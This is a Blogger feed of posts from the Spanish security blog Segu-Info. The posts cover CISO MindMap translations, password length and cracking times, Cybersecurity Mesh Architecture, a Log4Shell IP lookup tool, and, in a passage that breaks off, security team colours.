tag:blogger.com,1999:blog-144234622024-03-19T05:48:06.587-03:00Segu-Info - Ciberseguridad desde 2000Noticias de Ciberseguridad desde Segu-InfoSeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.comBlogger798125tag:blogger.com,1999:blog-14423462.post-66506741495701246442023-09-23T10:41:00.005-03:002023-09-23T10:43:55.879-03:00CISO Mindmap 2023 ¿Qué hacen realmente los profesionales InfoSec y CISOs?<p>
La mayoría de las personas ajenas a la profesión de ciberseguridad no se dan
cuenta ni aprecian plenamente la complejidad del trabajo de un profesional de
la seguridad. Desde 2012,
<a href="https://rafeeqrehman.com/" rel="nofollow" target="_blank"
>CISO MindMap de Rafeeq Rehman</a
>
ha sido una herramienta educativa eficaz para comunicar las responsabilidades
de los CISO y ha permitido a los profesionales de la seguridad diseñar y
perfeccionar sus programas de seguridad.
</p>
<p>
Aquí está el
<a
href="https://rafeeqrehman.com/2022/04/24/ciso-mindmap-2022-what-do-infosec-professionals-really-do/"
rel="nofollow"
target="_blank"
>CISO MindMap</a
>
más reciente y actualizado para 2023/2024 con una serie de actualizaciones y
nuevas recomendaciones para este año.
</p>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://rafeeqrehman.com/wp-content/uploads/2023/03/CISO_Mindmap-2023-1-1187x1536.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="800"
data-original-width="618"
src="https://rafeeqrehman.com/wp-content/uploads/2023/03/CISO_Mindmap-2023-1-1187x1536.png"
/></a>
</div>
<h3 style="text-align: left;">¿Qué ha cambiado?</h3>
<p>
Con el tiempo, las responsabilidades de los profesionales de la seguridad no
hacen más que aumentar. ¿Por qué? La tecnología está cambiando rápidamente,
trayendo nuevas formas de hacer negocios, la adopción continua de la nube y
muchas tecnologías emergentes como el fenómeno ChatGPT con muchos proveedores
trabajando en soluciones similares.
</p>
<p>
No sólo se "espera" que los profesionales de InfoSec comprendan profundamente
estas tecnologías, sino que también brinden políticas/orientación sobre cómo
protegerlas. Por este motivo, cada año encuentras cosas nuevas en el CISO
MindMap. Como cada año, se agregan, cambian o eliminan pocas cosas del CISO
MindMap dependiendo de su relevancia.
<b
>Los artículos nuevos y modificados están marcados en color rojo para su
comodidad.</b
>
</p>
<p>
Fuente y :
<a
href="https://rafeeqrehman.com/2023/03/25/ciso-mindmap-2023-what-do-infosec-professionals-really-do/"
rel="nofollow"
target="_blank"
>Rafeeq Rehman</a
>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-41193000379258745492022-04-27T13:04:00.002-03:002022-04-27T13:04:00.363-03:00CISO Mindmap 2022. ¿Qué hacen realmente los profesionales InfoSec?<p style="text-align: right;">
<i>
Traducción de la fuente original <a href="https://rafeeqrehman.com/2022/04/24/ciso-mindmap-2022-what-do-infosec-professionals-really-do/" rel="nofollow" target="_blank">Rafeeq Rehman - CISO Mindmap 2022</a></i>
</p>
<p>
La mayoría de las personas fuera de la profesión de ciberseguridad no se dan
cuenta ni aprecian completamente la complejidad del trabajo de un profesional
de la seguridad. Desde 2012,
<a href="https://rafeeqrehman.com/2022/04/24/ciso-mindmap-2022-what-do-infosec-professionals-really-do/" rel="nofollow" target="_blank">CISO MindMap</a>
<a href="https://blog.segu-info.com.ar/2022/01/ciso-mindmap-2021-que-hacen-realmente.html" rel="nofollow" target="_blank">ha sido una herramienta educativa efectiva</a> y ha permitido a los profesionales
diseñar y refinar sus programas de seguridad.
</p>
<p>
Aquí está el último y actualizado
<a href="https://rafeeqrehman.com/2022/04/24/ciso-mindmap-2022-what-do-infosec-professionals-really-do/" rel="nofollow" target="_blank">CISO MindMap para 2022</a>
con una serie de actualizaciones y nuevas recomendaciones para 2022-2023.
</p>
<div style="text-align: center;">
<a href="https://rafeeqrehman.com/wp-content/uploads/2022/04/CISO_Mindmap_2022_no_headings.png"><img height="640" src="https://rafeeqrehman.com/wp-content/uploads/2022/04/CISO_Mindmap_2022_no_headings.png" width="495" /></a>
</div>
<div style="text-align: center;">
<small>Descargue la
<a href="https://rafeeqrehman.com/wp-content/uploads/2022/04/CISO_Mindmap_2022_no_headings.pdf">versión en PDF</a>
para obtener una mejor calidad de impresión.
</small>
</div>
<h3>¿Qué ha cambiado en 2022?</h3>
<p>
Con el tiempo, las responsabilidades de los profesionales de la seguridad no
hacen más que aumentar. ¿Por qué? La tecnología está cambiando rápidamente,
trayendo nuevas formas de hacer negocios, la adopción continua de la nube y
muchas tecnologías emergentes.
</p>
<p>
No solo se "espera" que los profesionales Infosec comprendan profundamente
estas tecnologías, sino que también proporcionen políticas y orientación sobre
cómo protegerlas. Por esta razón, cada año encuentras algunas cosas nuevas en
CISO MindMap. Como cada año, pocas cosas se agregan, cambian o eliminan del
Mapa Mental dependiendo de su relevancia. Los artículos modificados están
marcados en rojo para su conveniencia.
</p>
<p>Otros cambios incluyen:</p>
<ul style="text-align: left;">
<li>Eliminar duplicados</li>
<li>Combinar ramas con funciones superpuestas</li>
<li>
Agregar referencias de LCR del NIST a alto nivel, siempre que sea posible.
</li>
<li>
En algunos casos ha surgido una terminología más definida/aceptada. Por
ejemplo, Cloud Security Posture Management (CSPM) es un término ampliamente
aceptado ahora. Como resultado, he reemplazado algunos elementos de
seguridad en la nube con CSPM.
</li>
<li>
Fecha de vencimiento: un problema común es que muchos profesionales todavía
tienen copias más antiguas de CISO MindMap. Agregué una "fecha de
vencimiento" para que las personas sepan cuándo deben dejar de usar una
versión en particular. La fecha de vencimiento de la versión 2022 es finales
de junio de 2023. La próxima versión se publicará antes de que caduque la
versión actual.
</li>
</ul>
<h3>Recomendaciones para 2022-2023</h3>
<p>
Sé que ya recibe muchas recomendaciones de sus proveedores, analistas y
expertos de la industria y otros "expertos". También sé que muchas de estas
recomendaciones pueden tener algunos intereses creados y / o sesgos.
</p>
<p>
Hago mis propias recomendaciones como practicante cada año y trato de ser
objetivo, evitar la exageración, la necesidad de adopción en los próximos
12-18 meses, y centrarme únicamente en lo que muestran los datos y la
investigación.
</p>
<p>
Sin embargo, sigue siendo mi interpretación de los datos y los hechos y puedo
tener mis propios sesgos no deseados, incluso con toda objetividad y un
enfoque basado en la evidencia. Para mí, la parte más difícil al hacer estas
recomendaciones es elegir lo menos que pueda. La siguiente lista es más larga
de lo que me gustaría que fuera, pero espero que te dé algunas cosas en las
que pensar.
</p>
<p>
Los seguidores de MindMap se darían cuenta rápidamente de que algunos de estos
son los mismos que el año pasado.
</p>
<ol>
<li>
Reevaluar las defensas de ransomware, las capacidades de detección y
respuesta, realice un análisis de impacto en el negocio e identifique
procesos, aplicaciones y datos críticos.
</li>
<li>
Reducir/consolidar herramientas/tecnologías de seguridad y proveedores. Más
herramientas no necesariamente reducen el riesgo, pero agregan la necesidad
de mantener la experiencia en los equipos de seguridad.
</li>
<li>
Capacitar al personal sobre la perspicacia para los negocios, la creación de
valor, la influencia y la experiencia humana para servir mejor a los
negocios. No puedo enfatizar esto lo suficiente.
</li>
<li>
Hacer un inventario del software de código abierto (tanto de uso directo
como indirecto) y hágalo parte de su programa de gestión de
vulnerabilidades.
</li>
<li>
Desarrollar la experiencia del equipo en campos tecnológicos, incluidos los
modelos de aprendizaje automático (ML), la capacitación de modelos, la
seguridad de API, la malla de servicios, los contenedores, DevSecOps.
</li>
<li>Mantener un registro de riesgos.</li>
</ol>
<h3 style="text-align: left;">¿Cómo usar CISO Mindmap?</h3>
<p>
Recibo mensajes de muchos profesionales sobre cuántas formas diferentes están
usando CISO MindMap. A lo largo de los años, se ha convertido en una gran
herramienta para muchos de ustedes y aprecio sus comentarios y felicitaciones.
Las siguientes son algunas de las formas en que este mapa mental es bastante
útil:
</p>
<ul style="text-align: left;">
<li>
¿Te han preguntado qué haces realmente como profesional de la seguridad? El
CISO MindMap es una forma de responder a la pregunta y explicarla a las
personas. He escuchado de muchos profesionales que este MindMap es
extremadamente útil para explicar la complejidad de un trabajo de CISO,
especialmente a una audiencia de negocios.
</li>
<li>
Un medio para guiar la conversación con otros profesionales de la
tecnología.
</li>
<li>
SANS Institute lo utiliza como parte del Póster de Liderazgo de Seguridad.
</li>
<li>Diseño y perfeccionamiento de programas de seguridad.</li>
<li>
Algunos proveedores de seguridad utilizan el Mapa Mental para el
conocimiento.
</li>
<li>Discusiones grupales de CISO y/o reuniones comunitarias.</li>
</ul>
<p>
Obviamente hay mucho en este mapa mental. El estrés en las personas que tienen
estas responsabilidades es real. Si nada más, esto debería ayudar a los
líderes a reconocer ese estrés y hacer algo al respecto. Cubrí este tema
(estrés) en mi último libro
<a href="https://www.amazon.com/Cybersecurity-Arm-Wrestling-perpetual-Operations/dp/B091LWPGCV/">Cybersecurity Arm Wrestling: Winning the perpetual fight against crime by
building a modern Security Operations Center (SOC)</a>
también.
</p>
<h3>Traducción a otros idiomas</h3>
<p>
Algunos de ustedes se han ofrecido a traducir el mapa mental a otros idiomas.
Realmente lo aprecio y espero trabajar con usted para completar algunas
traducciones este año.
</p>
<h3>Reconocimientos</h3>
<p>
Muchas personas han contribuido al proceso de pensamiento detrás de este mapa
mental a lo largo de los años. Esta vez tuvimos un
<a href="https://www.linkedin.com/groups/14044149/">grupo de LinkedIn</a> para
recopilar sugerencias y comentarios de la comunidad. Si bien muchos
proporcionaron comentarios, la siguiente es una lista ordenada alfabéticamente
de personas y organizaciones que proporcionaron "sugerencias específicas" para
mejoras.
</p>
<ul style="text-align: left;">
<li>
<a href="https://www.linkedin.com/in/ahmedkamel85/">Ahmed Kamel</a>
</li>
<li>
<a href="https://www.linkedin.com/in/alan-ng-1b82556/">Alan Ng</a>
</li>
<li>
<a href="https://www.linkedin.com/in/aldo-febro/">Aldo Febro</a>
</li>
<li>
<a href="https://www.linkedin.com/in/alexandragobbi/">Alexandra Gobbi</a>
</li>
<li>
<a href="https://www.linkedin.com/in/atify/">Atif Yusuf</a>
</li>
<li>
<a href="https://www.linkedin.com/in/creverd/">Christophe Reverd </a>
</li>
<li>
<a href="https://www.linkedin.com/in/cisosclub/">CISOS CLUB</a>
</li>
<li>
<a href="https://www.linkedin.com/in/garethdavidwilliams/">Gareth Williams</a>
</li>
<li>
<a href="https://www.linkedin.com/in/georgejohnsoncissp/">George Johnson</a>
</li>
<li>
<a href="https://www.linkedin.com/in/indydhami/">Indy Dhami</a>
</li>
<li>
<a href="https://www.linkedin.com/in/johannbalaguer/">Johann Balaguer</a>
</li>
<li>
<a href="https://www.linkedin.com/in/thompson-m/">Matthew Thompson</a>
</li>
<li>
<a href="https://www.linkedin.com/in/pmcrumpchicago/">Phillip Crump</a>
</li>
<li>
<a href="https://www.linkedin.com/in/simonetti/">Rodolphe Simonetti </a>
</li>
<li>
<a href="https://www.linkedin.com/in/ryanguzal/">Ryan Guzal</a>
</li>
<li>
<a href="https://www.linkedin.com/in/shaun-van-niekerk-cissp-19144b45/">Shaun Van Niekerk</a>
</li>
<li>
<a href="https://www.linkedin.com/in/shrinivaskk/">Shrinivas Kulkarni</a>
</li>
<li>
<a href="https://www.linkedin.com/in/steve-cook-growth-expert/">Steve Cook</a>
</li>
<li>
<a href="https://www.linkedin.com/in/walterheffel/">Walter Heffel</a>
</li>
</ul>
Sus sugerencias contribuyeron al enriquecimiento general del mapa. Además, estoy
agradecido a todos los miembros de la comunidad que usan y comparten sus
experiencias. ¡Su aporte es muy apreciado!
<blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;">
<p style="text-align: left;">
<i>Nota de derechos de autor © Este MindMap es material con derechos de
autor. Sin embargo, es absolutamente gratis para todos (como el agua y el
aire) sin condiciones, siempre y cuando no se altere y no se use para
ganar dinero. Al usar este Mapa Mental, cite la fuente correctamente para
que los destinatarios puedan recibir futuras actualizaciones.
</i>
</p>
</blockquote>
<p>
Traducción de la fuente original
<a href="https://rafeeqrehman.com/2022/04/24/ciso-mindmap-2022-what-do-infosec-professionals-really-do/" rel="nofollow" target="_blank">Rafeeq Rehman - CISO Mindmap 2022</a>
</p>
Walter Heffelhttp://www.blogger.com/profile/08608679170170442445noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-77251275442215912712022-04-11T09:33:00.001-03:002022-04-11T09:33:00.285-03:00Por esto debes utilizar contraseñas de 16 caracteres o más<p>
Hace dos años,
<a href="https://www.hivesystems.io/blog/are-your-passwords-in-the-green-2020" rel="nofollow" target="_blank">HiveSystems publicó por primera vez una tabla de contraseñas</a>
con los tiempos que le insumiría a un atacante romperlas. Ahora actualizaron
los <a href="https://www.hivesystems.io/blog/are-your-passwords-in-the-green?" rel="nofollow" target="_blank">datos para el 2022</a>.
</p>
<p>
La tabla de 2020 mostraba la fortaleza relativa de una contraseña contra un
intento de descifrado de fuerza bruta, según la longitud y la complejidad de
la contraseña. Los datos se basaron en cuánto tiempo y presupuesto le
tomaría a un atacante descifrar el <i>hash</i> de una contraseña usando una
computadora de escritorio con una tarjeta gráfica de primer nivel.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="795" data-original-width="800" height="636" src="https://pbs.twimg.com/media/FP_QE61XIAIag5w?format=jpg&name=medium" width="640" />
</div>
<p>
Dos años más tarde, un período de tiempo bastante largo en términos de mejora
de la potencia de procesamiento, las cosas han cambiado bastante.
</p>
<p>
En el contexto de las contraseñas, un <i>"hash"</i> es una versión codificada
de una cadena de texto. En otras palabras, si se calcula el <i>hash</i> de la
palabra <i>"password"</i> usando el método de <i>hashing MD5</i>, el hash de
salida es <i>5f4dcc3b5aa765d61d8327deb882cf99</i>. Sabiendo esto, el atacante
puede <i>crackear</i> un <i>hash</i> por fuerza bruta, lo cual significa hacer
una lista de "todas" (en teoría) las combinaciones de caracteres y luego
codificarlas con el método de <i>hashing</i> que desee y corresponda al
sistema atacado. Al encontrar coincidencias entre su lista y los
<i>hashes</i> de las contraseñas robadas, el <i>cracker</i> pueden descubrir
la contraseña.
</p>
<p>
Las tarjetas gráficas son una placa especial que tiene una Unidad de
Procesamiento Gráfico (GPU) con una alta capacidad de cálculo matemático.
Resulta que también son excelentes para extraer criptomonedas y calcular
<i>hashes</i>. Por ejemplo, una aplicación popular para
<i>cracking de hashes</i> es <a href="https://hashcat.net/hashcat/" rel="nofollow" target="_blank">Hashcat</a> y permite utilizar la capacidad de cálculo de las GPU para calcular
<i>hashes.</i>
</p>
<p>
La tabla de contraseñas de 2020 utilizó datos de 2018 basados en contraseñas
<i>hasheadas</i> con MD5 y descifradas con una GPU RTX 2080. La GPU superior de 2022
es la RTX 3090, la cual resulta que tiene casi el triple de poder de cálculo
de <i>hashes</i> por segundo.
</p>
<h3 style="text-align: left;">¿Cuánto se tarda para romper una contraseña?</h3>
<p>
Suponiendo que se utilice la recomendación original de contraseñas de 8
caracteres del
<a href="https://pages.nist.gov/800-63-3/sp800-63b.html" rel="nofollow" target="_blank">NIST</a>, los crackers pueden romperla en menos de 5 horas (suponiendo que se use
todo el set de caracteres). Y, si se usa el poder de cómputo de la nube, ese
tiempo baja a 39 minutos utilizando 8 GPUs e invirtiendo U$S 32,77 por hora.
Obviamente, cuantas más instancias se utilicen en paralelo, menos tiempo
tomará.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" data-original-height="800" data-original-width="794" height="640" src="https://pbs.twimg.com/media/FP_QE6dacAMEfoV?format=jpg&name=medium" width="635" />
</div>
<p><b>
Conclusión: cualquier contraseña por debajo de 16 caracteres es potencialmente <i>crackeable</i> en pocas horas.
</b></p>
<h3>¿Quién usa MD5 y SHA1 para codificar sus contraseñas en 2022?</h3>
<p>
¡Buen punto! Las GPU pueden generar hashes MD5 muy rápidamente, mientras que
otras funciones de hash hacen que el proceso sea lento por diseño. Aunque
todavía hay una cantidad sorprendente de sitios que usan MD5 y SHA1, hay un
gran contingente que codifica sus contraseñas con <i>bcrypt</i> y otros.
</p>
<h3 style="text-align: left;">
¿Qué pasa si una contraseña ha sido robada anteriormente, se usan palabras
simples o se reutilizan entre sitios?
</h3>
<p>
La tabla de contraseñas se centra en la idea de que el atacante está
trabajando en una situación de "caja negra" y tiene que empezar desde cero
para <i>crackear</i> el <i>hash</i>.
</p>
<p>
Mediante el uso de <a href="https://project-rainbowcrack.com/table.htm" rel="nofollow" target="_blank">tablas de arcoíris</a>, ataques de diccionario y hashes robados
anteriormente, el resultado del <i>cracking</i> es "inmediato" (un solo
segundo).
</p>
<h3>¿Los SALT y hashes adaptativos?</h3>
<p>
La "sal" complica el proceso de cracking y afortunadamente lo métodos modernos
(como
<a href="https://en.wikipedia.org/wiki/Bcrypt" rel="nofollow" target="_blank">bcrypt</a>,
<a href="https://en.wikipedia.org/wiki/Scrypt" rel="nofollow" target="_blank">scrypt</a>,
<a href="https://en.wikipedia.org/wiki/Argon2" rel="nofollow" target="_blank">Argon2</a>
y
<a href="https://en.wikipedia.org/wiki/PBKDF2" rel="nofollow" target="_blank">PBKDF2</a>) tienen el <i>salting</i> incorporado y terminan siendo más fuerte
que cualquier otra implementación de <i>hash</i>. Por eso <b>¡USALOS!.</b>
</p>
<p>
Fuente:
<a href="https://www.hivesystems.io/blog/are-your-passwords-in-the-green?utm_source=tabletext" rel="nofollow" target="_blank">HiveSystems</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com4tag:blogger.com,1999:blog-14423462.post-40528873487244502312022-02-23T12:40:00.008-03:002022-02-23T12:58:06.323-03:00¿Qué es CyberSecurity Mesh Architecture (CSMA) y por qué es el futuro?<p>
<a
href="https://www.gartner.com/en/documents/4006915/top-strategic-technology-trends-for-2022-cybersecurity-mesh"
rel="nofollow"
target="_blank"
>Gartner predice</a
>
que, en 2024, la estrategia de malla de ciberseguridad generará grandes
ahorros en el costos de las infracciones e incidentes de seguridad.
</p>
<p>
<a
href="https://www.gartner.com/en/information-technology/insights/top-technology-trends"
rel="nofollow"
target="_blank"
>Según Gartner</a
>, la malla de ciberseguridad (<a
href="https://www.insight.com/en_US/glossary/c/cybersecurity-mesh.html"
rel="nofollow"
target="_blank"
>CyberSecurity Mesh</a
>
- <i>buzzword)</i> es
<i
>"una arquitectura flexible que integra servicios y componentes de seguridad
dispares y ampliamente distribuidos"</i
>. La empresa de investigación y consultoría tecnológica la nombró como la
segunda tendencia estratégica más alta para 2022, detrás de la estructura de
datos. Se trata de fortalecer la seguridad digital y acercar las herramientas
a los activos que están diseñadas para defender.
</p>
<p>
La malla de ciberseguridad es una estrategia de ciberdefensa que protege de
forma independiente cada dispositivo con su propio perímetro, como firewalls y
herramientas de protección de red. Muchas prácticas de seguridad utilizan un
único perímetro para proteger todo un entorno de TI, pero una malla de
ciberseguridad utiliza un enfoque holístico.
</p>
<div class="separator" style="clear: both; text-align: center;">
<img
border="0"
data-original-height="636"
data-original-width="800"
height="356"
src="https://www.esecurityplanet.com/wp-content/uploads/2021/11/gartner-security-mesh-scaled-e1637264959458.jpg"
width="640"
/>
</div>
<p><br /></p>
<p
>
Según IBM, las empresas de hoy en día implementan <a
href="https://www.ibm.com/security/data-breach"
>un promedio de 45 soluciones de seguridad en toda su red</a
>, lo que hace que cualquier tipo de administración centralizada sea casi
imposible. Y lo que es peor, detectar y responder a un incidente cibernético requiere de la coordinación
entre 19 de esas herramientas, lo que lleva a soluciones complejas que deben administrarse y
reconfigurarse constantemente cada vez que se actualiza un dispositivo. Necesitan una plataforma de ciberseguridad amplia, integrada y automatizada que proporcione administración y visibilidad centralizadas, admita e interopere en un vasto ecosistema de soluciones y se adapte automáticamente a los cambios dinámicos en la red.
</p>
<p>
<a
href="https://www.gartner.com/en/information-technology/insights/top-technology-trends"
rel="nofollow"
target="_blank"
>Según el analista de Gartner</a
>, Felix Gaehtgens, la malla de seguridad sigue siendo una estrategia en
lugar de una arquitectura definida, pero lo que sí está claro es que el
concepto alinea mejor las organizaciones con las amenazas, y por ello, no
debemos perder de vista el concepto:
<b>los atacantes no piensan en silos. Las organizaciones sí.</b>
</p>
<p>
El analista de Gartner, Ruggero Contu, señaló que los riesgos de seguridad se
están volviendo externos: la
<a
href="https://www.esecurityplanet.com/compliance/sbom/"
rel="nofollow"
target="_blank"
>cadena de suministro de software</a
>, la nube pública, el comercio de datos robados, IoT y OT son todas amenazas
fuera de la seguridad perimetral tradicional.
</p>
<p>
Las organizaciones que adopten una arquitectura de malla de ciberseguridad
para integrar herramientas de seguridad para trabajar como un ecosistema
cooperativo reducirán el impacto financiero de los incidentes individuales en
un promedio del 90%.
</p>
<p>
Pero cual es la diferencia de este concepto de los que hemos visto
anteriormente, pues que
<i
><a
href="https://securityintelligence.com/articles/cloud-security-trends-cybersecurity-mesh/"
rel="nofollow"
target="_blank"
>CyberSecurity Mesh Architecture (CSMA)</a
>
y
<a
href="https://blog.segu-info.com.ar/2021/07/principios-de-disenos-de-arquitecturas.html"
rel="nofollow"
target="_blank"
>Zero Trust Network Access (ZTNA)</a
>
incluirá capas de identidad, política, postura y dashboards... y mucho más.
Algo que en el resto de conceptos no se tenían en cuenta.
</i>
</p>
<p>
Por ejemplo, en lugar de que <a
href="https://www.esecurityplanet.com/products/siem-tools/"
rel="nofollow"
target="_blank"
>SIEM</a
>
o <a href="https://www.esecurityplanet.com/networks/soar/">SOAR</a> integren
herramientas de seguridad, la malla de seguridad utilizará análisis e
inteligencia de ciberseguridad. El <a
href="https://www.trendmicro.com/es_es/what-is/xdr.html"
>XDR, o detección y respuesta extendidas</a
>
surgió como una nueva forma para que los proveedores de seguridad vinculen sus
productos en una plataforma unificada. El XDR es una "base potencial" para el
análisis de seguridad y la inteligencia que requiere CSMA (<i
>CyberSecurity Mesh Architecture</i
>), al igual que lo son el SIEM o el SOAR, que "pueden agregar valor" a la
capa de análisis/inteligencia de seguridad en una malla de ciberseguridad.
</p>
<p>
Si mencionamos a la tecnología de "<a
href="https://www.esecurityplanet.com/networks/sase/"
>borde de servicio de acceso seguro" (SASE)</a
>
podría ser una aproximación al enfoque de malla dado que ofrece distintas
funciones de manera integrada, pero la estrategia en malla de ciberseguridad
tiene un alcance mucho más amplio.
</p>
<p>
Si observamos el
<a
href="https://www.esecurityplanet.com/products/top-cybersecurity-companies/"
>top de empresas de ciberseguridad</a
>, muchas de ellas tienen enfoques similares a CSMA en la actualidad, entre
ellos Fortinet, IBM, McAfee, Microsoft, Palo Alto Networks y
Broadcom-Symantec. Esas plataformas pueden proporcionar beneficios, escalar en
costes en el mediano plazo, pero tienen el potencial de depender del proveedor
y la falta de interoperabilidad.
</p>
<p>
Según Gaehtgens, se debe recomendar a las organizaciones que comiencen a
construir las capas de apoyo para una estrategia de malla de ciberseguridad
(sin olvidar la palabra clave de todo ello "estrategia"), incluidos análisis
de seguridad, estructura de identidad, gestión de políticas y dashboards, como
podemos observar en la imagen anterior. Las tecnologías de ciberseguridad
distribuida que ofrecen interoperabilidad serán claves para la estrategia de
malla de ciberseguridad, por lo que los usuarios deben evaluar funciones como
la inversión de las API de control, el soporte de estándares y el análisis
extensible.
</p><p>
Lo importante es que las organizaciones abarquen y adopten un enfoque integrado de la seguridad como parte de sus iniciativas de aceleración digital. Esto les proporcionará una complejidad reducida, operaciones simplificadas y una mayor efectividad de seguridad, independientemente de a dónde los lleve su viaje.
</p>
<p>
<b>
Debemos empezar a familiarizarnos con los estándares actuales y emergentes,
y los proyectos de código fuente abierto como una alternativa potencial para
complementar las brechas de interoperabilidad de los proveedores.</b
>
</p>
<p>
Fuente:
<a
href="https://ciberseguridad.blog/que-es-cybersecurity-mesh-architecture-csma-y-por-que-es-el-futuro/"
rel="nofollow"
target="_blank"
>CiberSeguridad</a
>
|
<a
href="https://www.esecurityplanet.com/networks/cybersecurity-mesh-decentralized-identity-emerging-security-technology/"
rel="nofollow"
target="_blank"
>eSecurity</a
>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com4tag:blogger.com,1999:blog-14423462.post-17401745521585216842022-01-24T13:57:00.006-03:002022-01-25T08:49:29.639-03:00CISO MindMap 2021: ¿Qué hacen realmente los profesionales de InfoSec?<p>
La mayoría de las personas ajenas a la profesión de la ciberseguridad no se
dan cuenta ni aprecian por completo la complejidad del trabajo de los
profesionales de la seguridad.
</p>
<p>
El
<a
href="https://rafeeqrehman.com/2021/07/11/ciso-mindmap-2021-what-do-infosec-professionals-really-do/"
rel="nofollow"
target="_blank"
>siguiente MindMap de Rafeeq Rehman</a
> (aka <a href="https://twitter.com/rafeeq_rehman">@rafeeq_rehman</a>) se actualiza hace muchos años no solo como una herramienta educativa
eficaz, sino también para permitir que los profesionales utilicen este recurso
para diseñar y perfeccionar sus programas de seguridad.
</p>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://rafeeqrehman.com/wp-content/uploads/2021/07/CISO_Job_MindMap_Rafeeq_Rehman_v_2021.png"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="800"
data-original-width="522"
height="640"
src="https://rafeeqrehman.com/wp-content/uploads/2021/07/CISO_Job_MindMap_Rafeeq_Rehman_v_2021.png"
width="418"
/></a>
</div>
<p>
Fuente:
<a
href="https://rafeeqrehman.com/2021/07/11/ciso-mindmap-2021-what-do-infosec-professionals-really-do/"
rel="nofollow"
target="_blank"
>Rafeeq Rehman</a
>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com2tag:blogger.com,1999:blog-14423462.post-78143129877959150842021-12-24T11:34:00.010-03:002021-12-24T15:20:26.432-03:00Busca IPs de #Log4Shell en tu red<p>
Desde
<b><a href="https://www.seguinfo.com.ar/" target="_blank">Segu-Info</a></b>
hemos creado una pequeña
<a href="https://www.segu-info.com.ar/ip/log4shell" target="_blank"
>herramienta</a
>
que permite buscar si una dirección IP se encuentra utilizando de alguna
manera la <b
>vulnerabilidad o el exploit de
<a
href="https://blog.segu-info.com.ar/search?by-date=true&q=Log4Shell"
target="_blank"
>Log4Shell (CVE-2021-44228)</a
>
en Log4j.</b
>
</p>
<p>
Basado en los datos suministrados por
<a
href="https://github.com/CriticalPathSecurity/Public-Intelligence-Feeds"
target="_blank"
>CriticalPathSecurity</a
>
y <a href="https://crowdsec.net/log4j-tracker/" target="_blank">CrowdSec</a>,
esta búsqueda permite obtener un resultado rápido sobre si una IP determinada
está relacionada con ataques de Log4Shell.
</p>
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://www.segu-info.com.ar/ip/log4shell"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
data-original-height="543"
data-original-width="800"
height="434"
src="https://i.imgur.com/Zw6yg8E.png"
width="640"
/></a>
</div>
<br />
<h3 style="text-align: left;">Cómo funciona</h3>
<p>
Para
<a
href="https://www.segu-info.com.ar/ip/log4shell"
rel="nofollow"
target="_blank"
>buscar una IP afectada</a
>, simplemente se coloca dicha IP y se brinda el resultado. Si la IP aparece,
quiere decir que ha formado parte de Log4Shell en los últimos 30 días. Se
puede saber más de la vulnerabilidad
<a
href="https://blog.segu-info.com.ar/2021/12/log4shell-vulnerabilidad-critica-con.html"
rel="nofollow"
target="_blank"
>Log4Shell aquí</a
>.
</p>
<p>
La vulnerabilidad Log4Shell afecta a innumerables organizaciones. <a
href="https://crowdsec.net/log4j-tracker/"
rel="nofollow"
target="_blank"
>CrowdSec lanzó un <i>script</i></a
>
que ayuda a detectar y bloquear los intentos de explotación de la
vulnerabilidad y brinda un listado de
<a
href="https://datastudio.google.com/reporting/c4359d52-9049-44be-9626-b1e2221bf67b/page/8GEcC"
rel="nofollow"
target="_blank"
>IPs afectadas</a
>.
</p>
<p>
<b
>Esta herramienta se suma a la búsqueda de <a
href="https://www.segu-info.com.ar/ip/fortinet"
target="_blank"
>dispositivos Fortinet afectados por la vulnerabilidad FG-IR-18-384</a
>
y a los de la
<a
href="https://www.segu-info.com.ar/ip/emotet"
rel="nofollow"
target="_blank"
>Botnet EMOTET</a
>.</b
>
</p>
<p><br /></p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0tag:blogger.com,1999:blog-14423462.post-91944833093459673972021-10-18T09:44:00.027-03:002021-10-18T09:44:00.416-03:00Yellow Team vs Orange Team vs Green Team<div class="separator">
<div class="separator" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;">
<img border="0" data-original-height="670" data-original-width="768" height="279" src="https://danielmiessler.com/images/BAD-pyramid-miessler-768x670.png" width="320" />
</div>
</div>
<p>
Además de los conocidos conceptos de
<span style="color: red;">equipos ROJO</span>,
<i><span style="color: #2b00fe;">AZUL</span></i> y
<span style="color: #800180;">PÚRPURA</span>, April Wright (aka
<a href="https://twitter.com/aprilwright" rel="nofollow" target="_blank">@aprilwrighta</a>) presentó algunos otros tipos de equipos en una charla de Blackhat llamada,
<a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Wright-Orange-Is-The-New-Purple.pdf" rel="nofollow" target="_blank">"El <span style="color: #ffa400;">NARANJA</span> es el nuevo Púrpura"</a>.</p><p>Louis Cremen (aka
<a href="https://twitter.com/proxyblue" rel="nofollow" target="_blank">@proxyblue</a>)también hizo un gran artículo sobre el trabajo de April en una publicación
titulada
<a href="https://hackernoon.com/introducing-the-infosec-colour-wheel-blending-developers-with-red-and-blue-security-teams-6437c1a07700" rel="nofollow" target="_blank">"Introducción a la rueda de colores de seguridad de la información"</a>.
</p>
<p>
En esa charla, presentó el concepto del
<b><span style="color: #fcff01;">YELLOW Team</span></b>, que son los <b>Constructores</b>, y luego los combinó con el Azul y Rojo
para producir los otros colores. Las interpretaciones de estas interacciones
se pueden combinar en la
<a href="https://blog.segu-info.com.ar/2021/09/red-team-vs-blue-team-vs-purple-team.html" target="_blank"><b>Pirámide BAD</b></a>, que es una forma puramente derivada del trabajo de April.
</p>
<p>
Tampoco importa mucho que se asigne la palabra "equipo" a todos estos colores,
